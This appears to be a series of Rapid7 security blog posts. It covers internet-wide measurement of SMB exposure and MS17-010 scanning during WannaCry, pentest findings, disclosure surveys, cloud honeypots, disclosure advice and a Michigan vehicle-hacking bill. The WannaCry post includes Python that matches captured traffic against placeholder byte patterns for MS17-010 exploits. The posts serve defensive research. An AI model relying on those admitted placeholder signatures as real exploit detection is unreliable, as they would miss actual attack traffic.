
WannaCry Overview

Last week the WannaCry ransomware worm, also known as Wanna Decryptor, Wanna Decryptor 2.0, WNCRY, and WannaCrypt, started spreading around the world, holding computers for ransom at hospitals, government offices, and businesses. To recap: WannaCry exploits a vulnerability in the Windows Server Message Block (SMB) file sharing protocol. It spreads to unpatched devices directly connected to the internet and, once inside an organization, to those machines and devices behind the firewall as well. For full details, check out the blog post: Wanna Decryptor (WannaCry) Ransomware Explained.

 

Since last Friday morning (May 12), there have been several other interesting posts about WannaCry from around the security community. Microsoft provided specific guidance to customers on protecting themselves from WannaCry. MalwareTech wrote about how registering a specific domain name triggered a kill switch in the malware, stopping it from spreading. Recorded Future provided a very detailed analysis of the malware’s code.

 

However, the majority of reporting about WannaCry in the general news has been that while MalwareTech’s domain registration has helped slow the spread of WannaCry, a new version that avoids that kill switch will be released soon (or is already here) and that this massive cyberattack will continue unabated as people return to work this week.

 

In order to understand these claims and monitor what has been happening with WannaCry, we have used data collected by Project Sonar and Project Heisenberg to measure the population of SMB hosts directly connected to the internet, and to learn about how devices are scanning for SMB hosts.

 

Part 1: In which Rapid7 uses Sonar to measure the internet

Project Sonar regularly scans the internet on a variety of TCP and UDP ports; the data collected by those scans is available for you to download and analyze at scans.io. WannaCry exploits a vulnerability in devices running Windows with SMB enabled, which typically listens on port 445. Using our most recent Sonar scan data for port 445 and the recog fingerprinting system, we have been able to measure the deployment of SMB servers on the internet, differentiating between those running Samba (the open-source implementation of the SMB protocol for Linux and other Unix-like systems) and actual Windows devices running vulnerable versions of SMB.
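To make the mechanics concrete, here is a minimal sketch of the kind of tally this involves, assuming a downloaded Sonar port-445 study as a gzipped CSV with ip and data (hex-encoded SMB response) columns; the column names and byte patterns below are illustrative stand-ins, not the actual scans.io schema or recog signatures.

```python
# Classify Sonar port-445 study records as Samba, Windows, or unknown.
# Assumes a gzipped CSV with "ip" and "data" (hex-encoded response) columns;
# the match patterns are simplified stand-ins for real recog fingerprints.
import binascii
import csv
import gzip
from collections import Counter

def classify(banner: bytes) -> str:
    if b"Samba" in banner:
        return "samba"
    if b"Windows" in banner:
        return "windows"
    return "unknown"

counts = Counter()
with gzip.open("sonar_tcp_445.csv.gz", "rt", newline="") as fh:
    for row in csv.DictReader(fh):
        banner = binascii.unhexlify(row["data"])
        counts[classify(banner)] += 1

print(counts.most_common())  # e.g. [("windows", ...), ("samba", ...), ...]
```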

 

We find that there are over 1 million internet-connected devices that expose SMB on port 445. Of those, over 800,000 run Windows, and — given that these are nodes running on the internet exposing SMB — it is likely that a large percentage of these are vulnerable versions of Windows with SMBv1 still enabled (other researchers estimate up to 30% of these systems are confirmed vulnerable, but that number could be higher).

 

We can look at the geographic distribution of these hosts using the following treemap (ISO3C labels provided where legible):

[Figure 1: Treemap of internet-exposed Windows SMB hosts by country]

 

The United States and countries across Asia and Europe have large pockets of Windows systems directly exposed to the internet, while other regions have managed to stay less exposed (even relative to their overall IPv4 block allocations).

 

We can also look at the various versions of Windows on these hosts:

[Figure 2: Windows versions seen on internet-exposed SMB hosts]

 

The vast majority of these are server-based Windows operating systems, but there is also an unhealthy mix of Windows desktop operating systems in there, some quite old. The operating system version levels also run the gamut of the Windows release history timeline:

[Figure 3: Windows release levels of internet-exposed SMB hosts]

 

Using Sonar, we can get a sense for what is out there on the internet offering SMB services. Some of these devices are researchers running honeypots (like us), and some are other research tools, but the vast majority represent actual devices configured to run SMB on the public internet. We can see them with our light-touch Sonar scanning, and other researchers with more invasive scanning techniques have been able to positively identify that infection rates are hovering around 2%.

 

Part 2: In which Rapid7 uses Heisenberg to listen to the internet

While Project Sonar scans the internet to learn about what is out there, Project Heisenberg is almost the inverse: it listens to the internet to learn about scanning activity. Since SMB typically runs on port 445, and the WannaCry malware scans port 445 for potential targets, we can look at incoming connection attempts on port 445 to Heisenberg nodes, as shown in Figure 4. Scanning activity spiked briefly on 2017-05-10 and 2017-05-11, increased quite a bit on 2017-05-12, and has stayed at elevated levels since.

 

[Figure 4: Incoming connection attempts on port 445 to Heisenberg nodes, by day]

 

Not all traffic to Heisenberg on port 445 is an attempt to exploit the SMB vulnerability that WannaCry targets (MS17-010). There is always scanning traffic on port 445 (just look at the activity from 2017-05-01 through 2017-05-09), but a majority of the traffic captured between 2017-05-12 and 2017-05-14 was attempting to exploit MS17-010 and likely came from devices infected with the WannaCry malware. To determine this, we matched the raw packets captured by Heisenberg on port 445 against sample packets known to exploit MS17-010.
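The matching step itself is conceptually simple. Here is a rough sketch, where the signature bytes are placeholders for the sample exploit packets we compared against (the real patterns are longer and more specific):

```python
# Flag captured port-445 payloads that look like MS17-010 exploit attempts.
# SIGNATURES holds placeholder byte patterns; the actual matching used
# sample packets known to exploit MS17-010.
SIGNATURES = {
    "smbv1_negotiate": b"\xffSMB\x72",  # SMBv1 Negotiate Protocol command
    "smbv1_trans2": b"\xffSMB\x32",     # SMBv1 Trans2 command (placeholder)
}

def matches_ms17_010(payload: bytes) -> bool:
    return any(sig in payload for sig in SIGNATURES.values())

def split_traffic(payloads):
    """Separate exploit-like payloads from background scanning noise."""
    exploit = [p for p in payloads if matches_ms17_010(p)]
    background = [p for p in payloads if not matches_ms17_010(p)]
    return exploit, background
```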

 

Figure 5 shows the number of unique IP addresses scanning for port 445, grouped by hour between 2017-05-10 and 2017-05-16. The black line shows that at the same time that the number of incoming connections increases (2017-05-12 through 2017-05-14), the number of unique IP addresses scanning for port 445 also increases. Furthermore, the orange line shows the number of new, never-before-seen IPs scanning for port 445. From this we can see that a majority of the IPs scanning for port 445 between 2017-05-12 and 2017-05-14 were new scanners.
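The new-versus-returning distinction in Figure 5 falls out of a simple running-set computation. A minimal sketch, assuming events arrive as (timestamp, source_ip) pairs parsed from the honeypot logs:

```python
# For each hour, count unique source IPs and the subset never seen before.
from collections import defaultdict

def unique_and_new_by_hour(events):
    """events: iterable of (datetime, str) pairs -> [(hour, unique, new)]."""
    by_hour = defaultdict(set)
    for ts, ip in events:
        by_hour[ts.replace(minute=0, second=0, microsecond=0)].add(ip)

    seen = set()  # every IP observed in any earlier hour
    results = []
    for hour in sorted(by_hour):
        ips = by_hour[hour]
        results.append((hour, len(ips), len(ips - seen)))
        seen |= ips
    return results
```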

 

[Figure 5: Unique and never-before-seen source IPs scanning port 445, grouped by hour]

 

Finally, we see scanning activity from 157 different countries in the month of May, and scanning activity from 133 countries between 2017-05-12 and 2017-05-14. Figure 6 shows the top 20 countries from which we have seen scanning activity, ordered by the number of unique IPs from those countries.

 

[Figure 6: Top 20 countries by unique IPs scanning port 445]

 

While we have seen the volume of scans on port 445 increase compared to historical levels, it appears that the surge in scanning activity seen between 2017-05-12 and 2017-05-14 has started to tail off.

 

So what?

Using data collected by Project Sonar we have been able to measure the deployment of vulnerable devices across the internet, and we can see that there are many of them out there. Using data collected by Project Heisenberg, we have seen that while scanning for devices that expose port 445 has been observed for quite some time, the volume of scans on port 445 has increased since 2017-05-12, and a majority of those scans are specifically looking to exploit MS17-010, the SMB vulnerability that the WannaCry malware looks to exploit.

 

MS17-010 will continue to be a vector used by attackers, whether from the WannaCry malware or from something else. Please, follow Microsoft's advice and patch your systems. If you are a Rapid7 InsightVM or Nexpose customer, or you are running a free 30 day trial, here is a step-by-step guide on how you can scan your network to find all of your organization's assets that are potentially at risk.

 

Coming Soon

If this sort of information about internet-wide measurements and analysis is interesting to you, stay tuned for the National Exposure Index 2017. Last year, we used Sonar scans to evaluate the security exposure of all the countries of the world based on the services they exposed on the internet. This year, we have run our studies again, improved our methodology and infrastructure, and have new findings to share.

 

Related:

Today, we're excited to release Rapid7's latest research paper, Under the Hoodie: Actionable Research from Penetration Testing Engagements, by Bob Rudis, Andrew Whitaker, and Tod Beardsley, with loads of input and help from the entire Rapid7 pentesting team.

 

This paper covers the often occult art of penetration testing, and seeks to demystify the process, techniques, and tools that pentesters use to break into enterprise networks. By drawing on real, qualified data from the real-life engagements of dozens of pentesters in the field, we're able to suss out the most common vulnerabilities that are exploited, the most common network misconfigurations that are leveraged, and the most effective methods we've found to compromise high-value credentials.

 

Finding: Detection is Everything

Probably the most actionable finding we discovered is that most organizations that conduct penetration testing exercises have a severe lack of usable, reliable intrusion detection capabilities. Over two-thirds of our pentesters completely avoided detection during the engagement. This is especially concerning given that most assessments don't put a premium on stealth; due to constraints in time and scope, pentesters generate an enormous amount of malicious traffic. In an ideal network, this traffic would be setting off alarm bells everywhere. Most engagements end with recommendations to implement some kind of incident detection and response, regardless of which specific techniques for compromise were used.

Finding: Enterprise Size and Industry Don't Matter

When we started this study, we expected to find quantitative differences between small networks and large networks, and between different industries. After all, you might expect that a large, financial-industry enterprise of over 1,000 employees would be better equipped to detect and defend against unwelcome attackers, due to the security resources available and required by various compliance regimes and regulatory requirements. Or, you might believe that a small, online-only retail startup would be more nimble and more familiar with the threats facing their business.

 

Alas, this isn't the case. As it turns out, the detection and prevention rates are nearly identical between large and small enterprises, and no industry seemed to fare any better or worse when it came to successful compromises.

 

This is almost certainly due to the fact that IT infrastructure pretty much everywhere is built using the same software and hardware components. Thus, all networks tend to be vulnerable to the same common misconfigurations that have the same vulnerability profiles when patch management isn't firing at 100%. There are certainly differences in the details -- especially when it comes to custom-designed web applications -- but even those tend to have the same sorts of frameworks and components that power them.

 

The Human Touch

Finally, if you're not really into reading a bunch of stats and graphs, we have a number of "Under the Hoodie" sidebar stories, pulled from real-life engagements. For example, while discussing common web application vulnerabilities, we're able to share a story of how a number of otherwise lowish-severity, external web application issues led to the eventual compromise of the entire internal back-end network. Not only are these stories fun to read, they do a pretty great job of illustrating how unrelated issues can conspire on an attacker's behalf to lead to surprising levels of unauthorized access.

 

I hope you take a moment to download the paper and take a look at our findings; I don't know of any other research out there that explores the nuts and bolts of penetration testing in quite the depth or breadth that this report provides. In addition, we'll be covering the material at our booth at the RSA security conference next week in San Francisco, as well as hosting a number of "Ask a Pentester" sessions. Andrew and I will both be there, and we love nothing more than connecting with people who are interested in Rapid7's research efforts, so definitely stop by.

When cybersecurity researchers find a bug in product software, what’s the best way for the researchers to disclose the bug to the maker of that software? How should the software vendor receive and respond to researchers’ disclosure? Questions like these are becoming increasingly important as more software-enabled goods - and the cybersecurity vulnerabilities they carry - enter the marketplace. But more data is needed on how these issues are being dealt with in practice.

 

Today we helped publish a research report [PDF] that investigates attitudes and approaches to vulnerability disclosure and handling. The report is the result of two surveys – one for security researchers, and one for technology providers and operators – launched as part of a National Telecommunications and Information Administration (NTIA) “multistakeholder process” on vulnerability disclosure. The process split into three working groups: one focused on building norms/best practices for multi-party complex disclosure scenarios; one focused on building best practices and guidance for disclosure relating to “cyber safety” issues; and one focused on driving awareness and adoption of vulnerability disclosure and handling best practices. It is this last group, the “Awareness and Adoption Working Group,” that devised and issued the surveys in order to understand what researchers and technology providers are doing on this topic today, and why. Rapid7 - along with several other companies, organizations, and individuals - participated in the project (in full disclosure, I am co-chair of the working group) as part of our ongoing focus on supporting security research and promoting collaboration between the security community and technology manufacturers.

 

The surveys, issued in April, investigated the reality around awareness and adoption of vulnerability disclosure best practices. I blogged at the time about why the surveys were important: in a nutshell, while the topic of vulnerability disclosure is not new, adoption of recommended practices is still seen as relatively low. The relationship between researchers and technology providers/operators is often characterized as adversarial, with friction arising from a lack of mutual understanding. The surveys were designed to uncover whether these perceptions are exaggerated, outdated, or truly indicative of what’s really happening. In the latter instance, we wanted to understand the needs or concerns driving behavior.

 

The survey questions focused on past or current behavior for reporting or responding to cybersecurity vulnerabilities, and processes that worked or could be improved. One quick note – our research efforts were somewhat imperfect because, as my data scientist friend Bob Rudis is fond of telling me, we effectively surveyed the internet (sorry Bob!). This was really the only pragmatic option open to us; however, it did result in a certain amount of selection bias in who took the surveys. We made a great deal of effort to promote the surveys as far and wide as possible, particularly through vertical sector alliances and information sharing groups, but we expect respondents have likely dealt with vulnerability disclosure in some way in the past. Nonetheless, we believe the data is valuable, and we’re pleased with the number and quality of responses.

 

There were 285 responses to the vendor survey and 414 to the researcher survey. View the infographic here [PDF].

 

Key findings

Researcher survey

[Infographic: key findings from the researcher survey]

  • The vast majority of researchers (92%) generally engage in some form of coordinated vulnerability disclosure.
  • When they have gone a different route (e.g., public disclosure) it has generally been because of frustrated expectations, mostly around communication.
  • The threat of legal action was cited by 60% of researchers as a reason they might not work with a vendor to disclose.
  • Only 15% of researchers expected a bounty in return for disclosure, but 70% expected regular communication about the bug.

 

Vendor survey

  • Vendor responses were generally separable into “more mature” and “less mature” categories. Most of the more mature vendors (between 60 and 80%) used all the processes described in the survey.
  • Most “more mature” technology providers and operators (76%) look internally to develop vulnerability handling procedures, with smaller proportions looking at their peers or at international standards for guidance.
  • More mature vendors reported that a sense of corporate responsibility or the desires of their customers were the reasons they had a disclosure policy.
  • Only one in three surveyed companies considered and/or required suppliers to have their own vulnerability handling procedures.

 

Building on the data for a brighter future

With the rise of the Internet of Things we are seeing unprecedented levels of complexity and connectivity for technology, introducing cybersecurity risk in all sorts of new areas of our lives. Adopting robust mechanisms for identifying and reporting vulnerabilities, and building productive models for collaboration between researchers and technology providers/operators has never been so critical.

 

It is our hope that this data can help guide future efforts to increase awareness and adoption of recommended disclosure and handling practices. We have already seen some very significant evolutions in the vulnerability disclosure landscape – for example, the DMCA exemption for security research; the FDA post-market guidance; and proposed vulnerability disclosure guidance from NHTSA. Additionally, in the past year, we have seen notable names in defense, aviation, automotive, and medical device manufacturing and operating all launch high profile vulnerability disclosure and handling programs. These steps are indicative of an increased level of awareness and appreciation of the value of vulnerability disclosure, and each paves the way for yet more widespread adoption of best practices.

 

The survey data itself offers a hopeful message in this regard - many of the respondents indicated that they clearly understand and appreciate the benefits of a coordinated approach to vulnerability disclosure and handling. Importantly, both researchers and more mature technology providers indicated a willingness to invest time and resources into collaborating so they can create more positive outcomes for technology consumers.

 

Yet, there is still a way to go. The data also indicates that to some extent, there are still perception and communication challenges between researchers and technology providers/operators, the most worrying of which is that 60% of researchers indicated concern over legal threats. Responding to these challenges, the report advises that:

 

“Efforts to improve communication between researchers and vendors should encourage more coordinated, rather than straight-to-public, disclosure. Removing legal barriers, whether through changes in law or clear vulnerability handling policies that indemnify researchers, can also help. Both mature and less mature companies should be urged to look at external standards, such as ISOs, and further explanation of the cost-savings across the software development lifecycle from implementation of vulnerability handling processes may help to do so.”

 

The bottom line is that more work needs to be done to drive continued adoption of vulnerability disclosure and handling best practices. If you are an advocate of coordinated disclosure – great! – keep spreading the word. If you have not previously considered it, now is the perfect time to start investigating it. ISO 29147 is a great starting point, or take a look at some of the example policies such as the Department of Defense or Johnson and Johnson. If you have questions, feel free to post them here in the comments or contact community [at] rapid7 [dot] com.

 

As a final thought, I would like to thank everyone that provided input and feedback on the surveys and the resulting data analysis - there were a lot of you and many of you were very generous with your time. And I would also like to thank everyone that filled in the surveys - thank you for lending us a little insight into your experiences and expectations.

 

~ @infosecjen

Introducing Project Heisenberg Cloud

Project Heisenberg Cloud is a Rapid7 Labs research project with a singular purpose: understand what attackers, researchers and organizations are doing in, across and against cloud environments. This research is based on data collected from a new, Rapid7-developed honeypot framework called Heisenberg along with internet reconnaissance data from Rapid7's Project Sonar.

 

Internet-scale reconnaissance with cloud-inspired automation

Heisenberg honeypots are a modern take on the seminal attacker detection tool. Each Heisenberg node is a lightweight, highly configurable agent that is centrally deployed using well-tested tools, such as Terraform, and controlled from a central administration portal. Virtually any honeypot code can be deployed to Heisenberg agents, and all agents send back full packet captures for post-interaction analysis.

 

One of the main goals of Heisenberg is to understand attacker methodology. All interaction and packet capture data is synchronized to a central collector, and all real-time logs are fed directly into Rapid7's Logentries for live monitoring and historical data mining.

 

Insights into cloud configs and attacker methodology

Rapid7 and Microsoft deployed multiple Heisenberg honeypots in every "zone" of six major cloud providers - Amazon, Azure, Digital Ocean, Rackspace, Google, and Softlayer - and examined the service diversity in each of these environments and the types of connections attackers, researchers, and organizations are initiating within, against, and across these environments.

 

To paint a picture of the services offered in each cloud provider, the research teams used Sonar data collected during Rapid7's 2016 National Exposure study. Some highlights include:

 

  • The six cloud providers in our study make up nearly 15% of available IPv4 addresses on the internet.
  • 22% of Softlayer nodes expose database services (MySQL & SQL Server) directly to the internet.
  • Web services are prolific, with 53-80% of nodes in each provider exposing some type of web service.
  • Digital Ocean and Google nodes expose shell (Telnet & SSH) services at a much higher rate - 86% and 74%, respectively - than the other four cloud providers in this study.
  • A wide range of attacks were detected, including ShellShock, SQL injection, PHP webshell injection, and credential attacks against SSH, Telnet, and remote framebuffer services (e.g. VNC, RDP & Citrix).
  • Our honeypots caught "data mashup" businesses attempting to use the cloud to mask illegal content scraping activity.

 

Read More

For more detail on our initial findings with Heisenberg Cloud, please click here to download our report or here for slides from our recent UNITED conference presentation.

 

Acknowledgements

We would like to thank Microsoft and Amazon for engaging with us through the initial stages of this research effort, and as indicated above, we hope they, and other cloud hosting providers will continue to do so as we move forward with the project.

This is a guest post from Art Manion, Technical Manager of the Vulnerability Analysis Team at the CERT Coordination Center (CERT/CC). CERT/CC is part of the Software Engineering Institute at Carnegie Mellon University.

 

October is National Cyber Security Awareness month and Rapid7 is taking this time to celebrate security research. This year, NCSAM coincides with new legal protections for security research under the DMCA and the 30th anniversary of the CFAA - a problematic law that hinders beneficial security research. Throughout the month, we will be sharing content that enhances understanding of what independent security research is, how it benefits the digital ecosystem, and the challenges that researchers face.

 

The CERT/CC has been doing coordinated vulnerability disclosure (CVD) since 1988. From the position of coordinator, we see the good, bad, and ugly from vendors, security researchers and other stakeholders involved in CVD. In this post, I'm eventually going to give some advice to security researchers. But first, some background discussion about sociotechnical systems, the internet of things, and chilling effects.

 

While there are obvious technological aspects of the creation, discovery, and defense of vulnerabilities, I think of cybersecurity and CVD as sociotechnical systems. Measurable improvements will depend as much on effective social institutions ("stable, valued, recurring patterns of [human] behavior") as they will on technological advances. The basic CVD process itself -- discover, report, wait, publish -- is an institution concerned with socially optimal [PDF] protective behavior. This means humans making decisions, individually and in groups, with different information, incentives, beliefs, and norms. Varying opinions about "optimal" explain why, despite three decades of debate and both offensive and defensive technological advances, vulnerability disclosure remains a controversial topic.

 

To add further complication, the rapid expansion of the internet of things has changed the dynamics of CVD and cybersecurity in general. Too many "things" have been designed with the same disregard to security associated with internet-connected systems of the 1980s, combined with the real potential to cause physical harm. The Mirai botnet, which set DDoS bandwidth records in 2016, used an order of magnitude fewer username and password guesses than the Morris worm did in 1988. Remote control attacks on cars and implantable medical devices have been demonstrated. The stakes involved in software security and CVD are no longer limited to theft of credit cards, account credentials, personal information, and trade or national secrets.

 

In pursuit of socially optimal CVD and with consideration for the new dynamics of IoT, I've become involved in two policy areas: defending beneficial security research and defining CVD process maturity. These two areas intersect when researchers choose CVD as part of their work, and that choice is not without risk to the researcher.

 

The security research community has valid and serious concerns about the chilling effects, real and perceived, of legal barriers and other disincentives [PDF] to performing research and disclosing results. On the other hand, there is a public policy desire to differentiate legitimate and beneficial security research from criminal activity. The confluence of these two forces leads to the following conundrum: If rules for security researchers are codified -- even with broad agreement from researchers, whose opinions differ -- any research activity that falls out of bounds could be considered unethical or even criminal.

 

Codified rules could reduce the grey area created by "exceeds authorized access" and the steady supply of new vulnerabilities (often discovered by accessing things in interesting and unexpected ways). But with CVD, and most complex interactions, the exception is the rule and CVD is full of grey. Honest mistakes, competing interests, language, time zone, and cultural barriers, disagreements, and other forms of miscommunication are commonplace. There's still too little information and too many moving parts to codify CVD rules in a fair and effective way.

 

Nonetheless, I see value in improving the quality of vulnerability reports and CVD as an institution, so here is some guidance for security researchers who choose the CVD option. Most of this advice is based on my experience at the CERT/CC for the last 15 years, which is bound to include some personal opinion, so caveat lector.

 

  • Be aware. In three decades of debate, a lot has been written about vulnerability disclosure. Read up, talk to your peers. If you're subject to U.S. law and read only one reference, it should be the EFF's Coders' Rights Project Vulnerability Reporting FAQ.

 

  • Be humble. Your vulnerability is not likely the most important out of 14,000+ public disclosures this year. Please think carefully before registering a domain for your vulnerability. You might fully understand the system you're researching, or you might not, particularly if the system has significant, non-traditional-compute context, like implantable medical devices.

 

  • Be confident. If your vulnerability is legit, then you'll be able to demonstrate it, and others will be able to reproduce it. You're also allowed to develop your reputation and brand, just not at a disproportionate cost to others.

 

  • Be responsible. CVD is full of externalities. Admit when you're wrong, make clarifications and corrections.

 

  • Be concise. A long, rambling report or advisory costs readers time and mental effort and is usually an indication of a weak or invalid report. If you've got a real vulnerability, demonstrate it clearly and concisely.

 

  • PoC||GTFO. This one goes hand in hand with being concise. Actual PoC may not be necessary, but provide clear evidence of the vulnerable behavior you're reporting and steps for others to reproduce. Videos might help, but they don't cut it by themselves.

 

  • Be clear. Both with your intentions and your communications. You won't reach agreement with everyone, particularly about when to publish, but try to avoid surprises. Use ISO 8601 date/time formats. Use simple phrasing and avoid idioms.

 

  • Be professional. Professionals balance humility, confidence, candor, and caution. Professionals don't need to brag. Professionals get results. Let your work speak for itself, don't exaggerate.

 

  • Be empathetic. Vendors and the others you're dealing with have their own perspectives and constraints. Take some extra care with those who are new to CVD.

 

  • Minimize harm. Public disclosure is harmful. It increases risk to affected users (in the short term at least) and costs vendors and defenders time and money. The theory behind CVD is that in the long run, public disclosure is universally better than no disclosure. I'm not generally a fan of analogies in cybersecurity, but harm reduction in public health is one I find useful (informed by, but different from, this take). If your research reveals sensitive information, stop at the earliest point of proving the vulnerability, don't share the information, and don't keep it. Use dummy accounts when possible.

 

In a society increasingly dependent on complex systems, security research is important work, and the behavior of researchers matters. At the CERT/CC, much of our CVD effort is focused on helping others build capability and improving institutions, thus, the advice above. We do offer a public CVD service, so if you've reached an impasse, we may be able to help.

 

Art Manion is the Technical Manager of the Vulnerability Analysis team in the CERT Coordination Center (CERT/CC), part of the Software Engineering Institute at Carnegie Mellon University. He has studied vulnerabilities and coordinated responsible disclosure efforts since joining CERT in 2001. After gaining mild notoriety for saying "Don't use Internet Explorer" in a conference presentation, Manion now focuses on policy, advocacy, and rational tinkering approaches to software security, including standards development in ISO/IEC JTC 1 SC 27 Security techniques. Follow Art at @zmanion and CERT at @CERT_Division.

Yesterday, the Michigan Senate Judiciary Committee passed a bill – S.B. 0927 – that forbids some forms of vehicle hacking, but includes specific protections for cybersecurity researchers. Rapid7 supports these protections. The bill is not law yet – it has only cleared a Committee in the Senate, but it looks poised to keep advancing in the state legislature. Our background and analysis of the bill is below.

 

In summary:

  • The amended bill offers legal protections for independent research and repair of vehicle computers. These protections do not exist in current Michigan state law.
  • The amended bill bans some forms of vehicle hacking that damage property or people, but we believe this was already largely prohibited under current Michigan state law.
  • The bill attempts to make penalties for hacking more proportional, but this may not be effective.

 

Background

 

Earlier this year, Michigan state Senator Mike Kowall introduced S.B. 0927 to prohibit accessing a motor vehicle's electronic system without authorization. The bill would have punished violations with a potential life sentence. As noted by press reports at the time, the bill's broad language made no distinction between malicious actors, researchers, or harmless access. The original bill is available here.

 

After S.B. 0927 was introduced, Rapid7 worked with a coalition of cybersecurity researchers and companies to detail concerns that the bill would chill legitimate research. We argued that motorists are safer as a result of independent research efforts that are not necessarily authorized by vehicle manufacturers. For example, in July 2015, researchers found serious security flaws in Jeep software, prompting a recall of 1.4 million vehicles. Blocking independent research to uncover vehicle software flaws would undermine cybersecurity and put motorists at greater risk.

 

Over a four-month period, Rapid7 worked rather extensively with Sen. Kowall's office and Michigan state executive agencies to minimize the bill's damage to cybersecurity research. We applaud their willingness to consider our concerns and suggestions. The amended bill passed by the Michigan Senate Judiciary Committee, we believe, will help provide researchers with greater legal certainty to independently evaluate and improve vehicle cybersecurity in Michigan.

 

The Researcher Protections

 

First, let's examine the bill's protections for researchers – Sec. 5(2)(B); pg. 6, lines 16-21. Explicit protection for cybersecurity researchers does not currently exist in Michigan state law, so we view this provision as a significant step forward.

 

This provision says researchers do not violate the bill's ban on vehicle hacking if the purpose is to test, refine, or improve the vehicle – and not to damage critical infrastructure, other property, or injure other people. The research must also be performed under safe and controlled conditions. A court would need to interpret what qualifies as "safe and controlled" conditions – hacking a moving vehicle on a highway probably would not qualify, but we would argue that working in one's own garage likely sufficiently limits the risks to other people and property.

 

The researcher protections do not depend on authorization from the vehicle manufacturer, dealer, or owner. However, because of the inherent safety risks of vehicles, Rapid7 would support a well-crafted requirement that research beyond passive signals monitoring must obtain authorization from the vehicle owner (as distinct from the manufacturer).

 

The bill offers similar protections for licensed manufacturers, dealers, and mechanics [Sec. 5(2)(A); pg. 6, lines 10-15]. However, neither current state law nor the bill would explicitly give vehicle owners (who are not mechanics, or are not conducting research) the right to access their own vehicle computers without manufacturer authorization. Since Michigan state law does not clearly give owners this ability today, the bill is not a step back here. Nonetheless, we would prefer the legislation make clear that it is not a crime for owners to independently access their own vehicle and device software.

 

The Vehicle Hacking Ban

 

The amended bill would explicitly prohibit unauthorized access to motor vehicle electronic systems to alter or use vehicle computers, but only if the purpose was to damage the vehicle, injure persons, or damage other property [Sec. 5(1)(c)-(d); pgs. 5-6, lines 23-8]. That is an important limit that should exclude, for example, passive observation of public vehicle signals or attempts to fix (as opposed to damage) a vehicle.

 

Although the amended bill would introduce a new ban on certain types of vehicle hacking, our take is that this was already illegal under existing Michigan state law. Current Michigan law – at MCL 752.795 – prohibits unauthorized access to "a computer program, computer, computer system, or computer network." The current state definition of "computer" – at MCL 752.792 – is already sweeping enough to encompass vehicle computers and communications systems. Since the law already prohibits unauthorized hacking of vehicle computers, it's difficult to see why this legislation is actually necessary. Although the bill’s definition of "motor vehicle electronic system" is too broad [Sec. 2(11); pgs. 3-4, lines 25-3], its redundancy with current state law makes this legislation less of an expansion than if there were no overlap.

 

Penalty Changes

 

The amended bill attempts to create some balance to sentencing under Michigan state computer crime law [Sec. 7(2)(A); pg. 8, line 11]. This provision essentially makes harmless violations of Sec. 5 (which includes the general ban on hacking, including vehicles) a misdemeanor, as opposed to a felony. Current state law – at MCL 752.797(2) – makes all Sec. 5 violations felonies, which is potentially harsh for innocuous offenses. We believe that penalties for unauthorized hacking should be proportionate to the crime, so building additional balance in the law is welcome.

 

However, this provision is limited and contradictory. The Sec. 7 provision applies only to those who "did not, and did not intend to," acquire/alter/use a computer or data, and if the violation can be "cured without injury or damage." But to violate Sec. 5, the person must have intentionally accessed a computer to acquire/alter/use a computer or data. So the person did not violate Sec. 5 in the first place if the person did not do those things or did not do them intentionally. It’s unclear under what scenario Sec. 7 would kick in and provide a more proportionate sentence – but at least this provision does not appear to cause any harm. We hope this provision can be strengthened and clarified as the bill moves through the Michigan state legislature.

 

Conclusion

 

On balance, we think the amended bill is a major improvement on the original, though not perfect. The most important improvements we'd like to see are:

  1. Clarifying the penalty limitation in Sec. 7; 
  2. Narrowing the definition of "motor vehicle electronic system" in Sec. 2; and
  3. Limiting criminal liability for owners that access software on vehicle computers they own.

 

However, the clear protections for independent researchers are quite helpful, and Rapid7 supports them. To us, the researcher protections further demonstrate that lawmakers are recognizing the benefits of independent research to advance safety, security, and innovation. The attempt at creating proportional sentences is also sorely needed and welcome, if inelegantly executed.

 

The amended bill is at a relatively early stage in the legislative process. It must still pass through the Michigan Senate and House. Nonetheless, it starts off on much more positive footing than it did originally. We intend to track the bill as it moves through the Michigan legislature and hope to see it improve further. In the meantime, we'd welcome feedback from the community.

Today, I'm happy to announce the latest research paper from Rapid7, National Exposure Index: Inferring Internet Security Posture by Country through Port Scanning, by Bob Rudis, Jon Hart, and me, Tod Beardsley. This research takes a look at one of the most foundational components of the internet: the millions and millions of individual services that live on the public IP network.

 

When people think about "the internet," they tend to think only of the one or two protocols that the World Wide Web runs on, HTTP and HTTPS. Of course, there are loads of other services, but which are actually in use, and at what rate? How much telnet, SSH, FTP, SMTP, or any of the other protocols that run on TCP/IP is actually in use today, where are they all located, and how much of it is inherently insecure due to running over non-encrypted, cleartext channels?

 

While projects like CAIDA and Shodan perform ongoing telemetry that covers important aspects of the internet, we here at Rapid7 are unaware of any ongoing effort to gauge the general deployment of services on public networks. So, we built our own, using Project Sonar, and we now have the tooling not only to answer these fundamental questions about the nature of the internet, but also to come up with more precise questions for specific lines of inquiry.

 

Can you name the top ten TCP protocols offered on the internet? You probably can guess the top two, but did you know that #7 is telnet? Yep, there are 15 million good old, reliable, usually unencrypted telnet servers out there, offering shells to anyone who cares to peek in on a cleartext password as it's being used.
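Rankings like this fall out of a simple per-port host tally over the Sonar studies. A minimal sketch, assuming one gzipped study file per scanned TCP port with one line per responsive host (the file naming is ours, not the actual scans.io layout):

```python
# Tally responsive hosts per TCP port across downloaded Sonar study files.
import glob
import gzip

def count_hosts(path: str) -> int:
    with gzip.open(path, "rt") as fh:
        return sum(1 for _ in fh)

totals = {}
for path in glob.glob("sonar_tcp_*.csv.gz"):
    # e.g. "sonar_tcp_23.csv.gz" -> port "23"
    port = path.split("_")[-1].split(".")[0]
    totals[port] = count_hosts(path)

for port, n in sorted(totals.items(), key=lambda kv: kv[1], reverse=True)[:10]:
    print(f"port {port}: {n} responsive hosts")
```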

 

We found some weird things on the national level, too. For instance, about 75% of the servers offering SMB/CIFS services - a (usually) Microsoft service for file sharing and remote administration for Windows machines -  reside in just six countries: the United States, China, Hong Kong, Belgium, Australia and Poland.

 

It's facts like these that made us realize that we have a fundamental gap in our awareness of the services deployed on the public side of firewalls the world over. This gap, in turn, makes it hard to truly understand what the internet is. So, the paper and the associated data we collected (and will continue to collect) can help us all get an understanding of what makes up one of the most significant technologies in use on Planet Earth.


So, you can score a copy of the paper, full of exciting graphs (and absolutely zero pie charts!) here. Or, if you're of a mind to dig into the data behind those graphs, you can score the summary data here and let us know what is lurking in there that you found surprising, shocking, or sobering.

